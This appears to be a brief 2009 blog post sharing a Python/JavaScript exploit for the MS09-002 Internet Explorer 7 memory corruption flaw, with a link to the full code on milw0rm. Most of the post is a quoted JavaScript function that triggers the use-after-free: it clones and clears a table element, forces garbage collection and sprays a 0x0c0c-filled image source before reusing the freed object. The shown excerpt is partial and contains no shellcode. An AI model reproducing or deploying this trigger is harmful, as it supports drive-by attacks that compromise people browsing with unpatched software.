Wednesday, March 4, 2009

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) in Python

Yo..Ahmed Obied posted script for MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) in Python. The full coding can be obtained from http://www.milw0rm.com/exploits/8152
.......
         function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;

CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

obj_cp.click;
}
.......continued

0 comments: